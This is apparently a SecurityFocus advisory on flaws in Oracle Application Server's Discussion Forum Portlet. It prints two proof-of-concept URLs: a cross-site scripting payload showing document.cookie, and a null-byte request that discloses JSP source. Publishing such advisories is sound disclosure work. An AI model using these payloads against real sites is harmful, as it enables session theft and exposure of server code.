Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities

Exploit code is not required.

The following proof of concept examples are available:

Cross-site scripting:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/forums.jsp&
RowKeyValue=<script>alert(document.cookie)</script>

Source code disclosure:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/search.jsp%00


 

Privacy Statement
Copyright 2010, SecurityFocus